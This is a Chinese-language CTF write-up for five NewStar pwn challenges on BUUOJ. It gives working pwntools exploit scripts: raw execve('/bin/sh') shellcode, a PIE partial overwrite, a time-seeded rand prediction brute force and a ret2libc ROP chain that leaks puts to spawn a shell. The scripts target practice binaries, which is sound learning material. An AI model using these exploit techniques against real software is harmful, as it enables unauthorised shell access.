1.ezshellcode

直接sendline(shellcode)即可 exp:

from pwn import *
p = remote("node4.buuoj.cn",29374)
#p = process('/home/miyu/Desktop/ezshellcode')

context(log_level = 'debug', arch = 'amd64', os = 'linux')
shellcode=asm(shellcraft.sh())
#shellcode = b'\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
payload = shellcode
p.sendlineafter('Show me your magic\n',payload)
p.interactive()

pwntools生成的shellcode和\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05都能过

2.p1eee

image.png

开启了PIE,地址的后三位(1.5字节)是随机的

image.png

发现了system(/bin/sh),于是我们直接把后两个字节改为126C即可 exp:

from pwn import *
#p = process('/home/miyu/Desktop/pwn (4)')
p = remote("node4.buuoj.cn",29573)
#gdb.attach(p)
offset = 0x20+8
p.sendline(b'a'*offset+p64(0x126C))
p.interactive()

3.newstar shop

通过购买机制让金钱变成负值即可,然后int型变量转化为unsigned int型变量即可进入后门

4.Random

image.png

以时间作为随机数种子,生成了v8,然后要求我们输入v6,当v8=v6时才能进入if里,我们可以使用与远程环境一样的libc版本,也以time(0)作为随机数种子

libc = cdll.LoadLibrary('libc.so.6')
libc.srand(libc.time(0))
a=libc.random()
p.sendline(str(a))
image.png image.png

我们需要让v4%2=1,v3='0'才可以构造出system($0) system($0)是和system(/bin/sh)等价的 所以我们要对后两位随机数进行爆破,直到满足v4%2=1,v3='0'为止 每次爆破后需要暂停一秒,以刷新时间种子

完整exp如下:

from pwn import *
from LibcSearcher import *
from ctypes import *
for i in range(100):
    p = remote("node4.buuoj.cn",27502)
    libc = cdll.LoadLibrary('libc.so.6')
    libc.srand(libc.time(0))
    try:
        a=libc.random()
        b=libc.random()
        c=libc.random()
        if b%5==2:
            if c%2==1:
                p.sendline(str(a))
                p.interactive()
    except:
        continue
    finally:
        p.close()
        sleep(1)

关于python中try、except、finally的用法,可以参考:

https://blog.csdn.net/weixin_44828950/article/details/91471459

5.ret2libc

image.png

发现存在pop rdi image.png

观察main函数,可以利用puts函数泄露libc

from pwn import *
from LibcSearcher import *

context(os="linux", arch="amd64", log_level="debug")
elf = ELF('/home/miyu/Desktop/ret2libc')
p = remote("node4.buuoj.cn", 28784)
pop_ret_rdi = 0x400763
ret = 0x400506
put_got = elf.got['puts']
put_plt = elf.plt['puts']
main_addr = 0x400698
offset = 0x20 + 8
payload = b'a' * offset + p64(pop_ret_rdi) + p64(put_got) + p64(put_plt) + p64(main_addr)
p.sendline(payload)
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")
system_addr = libc.dump("system") + libc_base
binsh_addr = libc.dump("str_bin_sh") + libc_base
Payload = b'a' * offset + p64(ret) + p64(pop_ret_rdi) + p64(binsh_addr) + p64(system_addr) 
p.sendline(Payload)
p.interactive()

64位用puts泄露libc 第一次payload泄露libc payload =b’A’*(0x20 +8) +p64(rdi_addr) +p64(elf.got[‘puts’]) +p64(elf.plt[“puts”]) +p64(main_addr)

第二次payload得shell payload=b’A’*(0x20 +8) +p64(ret_addr) +p64(rdi_addr) +p64(bin_sh) +p64(sys_addr)

libc版本选择1,得到flag